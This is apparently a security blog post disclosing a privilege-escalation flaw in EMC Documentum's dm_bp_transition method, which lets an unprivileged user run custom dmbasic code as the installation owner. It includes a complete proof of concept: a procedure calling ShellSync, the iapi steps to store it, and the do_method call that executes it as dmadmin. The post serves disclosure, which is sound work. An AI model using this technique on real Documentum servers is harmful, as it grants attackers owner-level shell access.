documentum security vulnerabilities: dm_bp_transition method

Documentum has two implementations of lifecycle transitions:

  • dmbasic
  • java

The first one is implemented by dm_bp_transition method:

API> retrieve,c,dm_method where object_name='dm_bp_transition'
...
1001ffd780000176
API> dump,c,l
...
USER ATTRIBUTES

  object_name                     : dm_bp_transition
  owner_name                      : dmadmin
  owner_permit                    : 7
  group_name                      : docu
  group_permit                    : 5
  world_permit                    : 3
  method_verb                     : ./dmbasic -f./dm_bp_transition.ebs -eBP_Transition
  method_args                   []: <none>
  launch_direct                   : T
  launch_async                    : F
  trace_launch                    : F
  run_as_server                   : T

this method accepts following parameters:

Sub BP_Transition(_
    docbase_name$,_
    server_config_name$,_
    user_name$,_
    user_ticket$,_
    sysID$,_
    policyID$,_
    aliasID$,_
    userEntryID$,_
    actionID$,_
    userActionID$,_
    userPostprocID$,_
    targetState$,_
    targetStateNo$,_
    resumeStateNo$,_
    run_entry$,_
    run_actions$,_
    commitFlag$,_
    attachFlag$,_
    login_as$,_
    orig_sessionID$)

the most interesting parameters are: user_name$ which is used to construct repository session:

  buff = "connect," & docbase_name & "." & server_config_name _
         & "," & user_name & "," & user_ticket
  sess = dmAPIGet(buff)

  If sess = "" Then
    dmExit(CONNECTION_ERROR)
  End If

and userPostprocID$ which is used to run custom dmbasic procedure:

  If (result = True And commitFlag = "T") Then
    If (debug = True) Then
      PrintToLog sess, "Commit the changes."
    End If
    result = CommitIt(sess, sysID, policyID, aliasID, targetStateNo, resumeStateNo, attachFlag)
    If (result = True) Then
      If (debug = True) Then
        PrintToLog sess, "Run post action."
      End If
      result = RunProcedure(userPostprocID, 4, sess, sysID,_
                            user_name, targetState)
    End If
  Else

Such implementation allows any user to write own dmbasic procedure and run it with installation owner privileges, example:

$ cat /tmp/test  
cat: /tmp/test: No such file or directory  
$ cat > test.ebs  
Public Function EntryCriteria(ByVal SessionId As String, 
                              ByVal ObjectId As String, 
                              ByVal UserName As String, 
                              ByVal TargetState As String, 
                              ByRef ErrorString As String
                ) As Boolean  
  t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test")  
  EntryCriteria=True  
End Function  
$ iapi  
Please enter a docbase name (docubase): repo  
Please enter a user (dmadmin): unprivileged_user  
Please enter password for unprivileged_user:  
  
  
        EMC Documentum iapi - Interactive API interface  
        (c) Copyright EMC Corp., 1992 - 2011  
        All rights reserved.  
        Client Library Release 6.7.1000.0027  
  
  
Connecting to Server using docbase repo  
[DM_SESSION_I_SESSION_START]info:  "Session 0101d920800b1a37 
       started for user unprivileged_user."  
  
  
Connected to Documentum Server running Release 6.7.1090.0170  Linux.Oracle  
Session id is s0  
API> create,c,dm_procedure  
...  
0801d920804e5416  
API> set,c,l,object_name  
SET> test  
...  
OK  
API> setfile,c,l,test.ebs,crtext  
...  
OK  
API> save,c,l  
...  
OK  
API> ?,c,execute do_method with method='dm_bp_transition', 
         arguments='repo repo dmadmin "" 0000000000000000 0000000000000000 
                    0000000000000000 0801d920804e5416 0000000000000000 0000000000000000 
                    0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000
         '  
(1 row affected)  
  
API> Bye  
$ cat /tmp/test  
dm_bp_transition_has_vulnerability

This vulnerability was reported as CS-44439 (Security vulnerability with dm_bp_transition.ebs – shell injection)

2 thoughts on “documentum security vulnerabilities: dm_bp_transition method

  1. Pingback: God bless EMC. Part VII | Documentum in a (nuts)HELL
  2. Pingback: Is it possible to compromise Documentum by deleting object? Typical mistakes | Documentum in a (nuts)HELL

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s